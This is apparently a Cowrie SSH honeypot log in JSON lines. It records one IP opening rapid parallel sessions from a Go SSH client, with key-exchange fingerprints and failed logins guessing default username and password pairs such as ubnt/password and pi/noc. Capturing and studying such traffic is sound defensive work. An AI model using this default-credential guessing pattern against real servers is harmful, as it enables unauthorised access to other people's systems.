{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54988,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e659a1b7fa4","protocol":"ssh","message":"New connection: 87.120.191.13:54988 (1.2.3.4:22) [session: 4e659a1b7fa4]","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.794744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.820755Z","src_ip":"87.120.191.13","session":"ffd83af5f7d2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.821650Z","src_ip":"87.120.191.13","session":"ffd83af5f7d2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.842807Z","src_ip":"87.120.191.13","session":"72150c61603b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.852832Z","src_ip":"87.120.191.13","session":"58a2c24fbc18"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.869695Z","src_ip":"87.120.191.13","session":"4e659a1b7fa4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.870533Z","src_ip":"87.120.191.13","session":"4e659a1b7fa4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54992,"dst_ip":"1.2.3.4","dst_port":22,"session":"42eba07b2fbe","protocol":"ssh","message":"New connection: 87.120.191.13:54992 (1.2.3.4:22) [session: 42eba07b2fbe]","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.872895Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55006,"dst_ip":"1.2.3.4","dst_port":22,"session":"582ace05c991","protocol":"ssh","message":"New connection: 87.120.191.13:55006 (1.2.3.4:22) [session: 582ace05c991]","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.890078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.948878Z","src_ip":"87.120.191.13","session":"42eba07b2fbe"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.949436Z","src_ip":"87.120.191.13","session":"42eba07b2fbe"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.973427Z","src_ip":"87.120.191.13","session":"582ace05c991"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.974168Z","src_ip":"87.120.191.13","session":"582ace05c991"}
{"eventid":"cowrie.login.failed","username":"noc","password":"noc","message":"login attempt [noc/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:36.074089Z","src_ip":"87.120.191.13","session":"69c987e3868f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"noc","message":"login attempt [ftpuser/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:36.111476Z","src_ip":"87.120.191.13","session":"582605073ff0"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"noc","message":"login attempt [ubnt/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:36.120924Z","src_ip":"87.120.191.13","session":"6c4758ebeeb7"}
{"eventid":"cowrie.login.failed","username":"student","password":"noc","message":"login attempt [student/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:36.157621Z","src_ip":"87.120.191.13","session":"ffd83af5f7d2"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"noc","message":"login attempt [ftpuser/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:36.195099Z","src_ip":"87.120.191.13","session":"4e659a1b7fa4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"noc","message":"login attempt [admin/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:36.258897Z","src_ip":"87.120.191.13","session":"42eba07b2fbe"}
{"eventid":"cowrie.login.failed","username":"pi","password":"noc","message":"login attempt [pi/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:36.296978Z","src_ip":"87.120.191.13","session":"582ace05c991"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.119343Z","src_ip":"87.120.191.13","session":"69c987e3868f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55008,"dst_ip":"1.2.3.4","dst_port":22,"session":"861a3f8dc284","protocol":"ssh","message":"New connection: 87.120.191.13:55008 (1.2.3.4:22) [session: 861a3f8dc284]","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.168001Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.176187Z","src_ip":"87.120.191.13","session":"582605073ff0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.179228Z","src_ip":"87.120.191.13","session":"6c4758ebeeb7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.191478Z","src_ip":"87.120.191.13","session":"861a3f8dc284"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.192184Z","src_ip":"87.120.191.13","session":"861a3f8dc284"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55014,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f4092d70eab","protocol":"ssh","message":"New connection: 87.120.191.13:55014 (1.2.3.4:22) [session: 8f4092d70eab]","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.199681Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.202468Z","src_ip":"87.120.191.13","session":"ffd83af5f7d2"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55028,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cfd5494215d","protocol":"ssh","message":"New connection: 87.120.191.13:55028 (1.2.3.4:22) [session: 0cfd5494215d]","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.217621Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.237103Z","src_ip":"87.120.191.13","session":"4e659a1b7fa4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.245656Z","src_ip":"87.120.191.13","session":"8f4092d70eab"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.246240Z","src_ip":"87.120.191.13","session":"8f4092d70eab"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55036,"dst_ip":"1.2.3.4","dst_port":22,"session":"846aaa943767","protocol":"ssh","message":"New connection: 87.120.191.13:55036 (1.2.3.4:22) [session: 846aaa943767]","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.248862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.261854Z","src_ip":"87.120.191.13","session":"0cfd5494215d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.262626Z","src_ip":"87.120.191.13","session":"0cfd5494215d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55046,"dst_ip":"1.2.3.4","dst_port":22,"session":"28bb065371b8","protocol":"ssh","message":"New connection: 87.120.191.13:55046 (1.2.3.4:22) [session: 28bb065371b8]","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.269212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.274736Z","src_ip":"87.120.191.13","session":"846aaa943767"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.275435Z","src_ip":"87.120.191.13","session":"846aaa943767"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.298440Z","src_ip":"87.120.191.13","session":"28bb065371b8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.299026Z","src_ip":"87.120.191.13","session":"28bb065371b8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.300647Z","src_ip":"87.120.191.13","session":"42eba07b2fbe"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55052,"dst_ip":"1.2.3.4","dst_port":22,"session":"107f22b696ae","protocol":"ssh","message":"New connection: 87.120.191.13:55052 (1.2.3.4:22) [session: 107f22b696ae]","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.348939Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.374542Z","src_ip":"87.120.191.13","session":"582ace05c991"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.379539Z","src_ip":"87.120.191.13","session":"107f22b696ae"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.380043Z","src_ip":"87.120.191.13","session":"107f22b696ae"}
{"eventid":"cowrie.login.failed","username":"noc","password":"password","message":"login attempt [noc/password] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.382161Z","src_ip":"87.120.191.13","session":"861a3f8dc284"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55066,"dst_ip":"1.2.3.4","dst_port":22,"session":"4361a2f1ecd9","protocol":"ssh","message":"New connection: 87.120.191.13:55066 (1.2.3.4:22) [session: 4361a2f1ecd9]","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.423761Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.431015Z","src_ip":"87.120.191.13","session":"8f4092d70eab"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"password","message":"login attempt [ubnt/password] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.449790Z","src_ip":"87.120.191.13","session":"0cfd5494215d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.463292Z","src_ip":"87.120.191.13","session":"4361a2f1ecd9"}
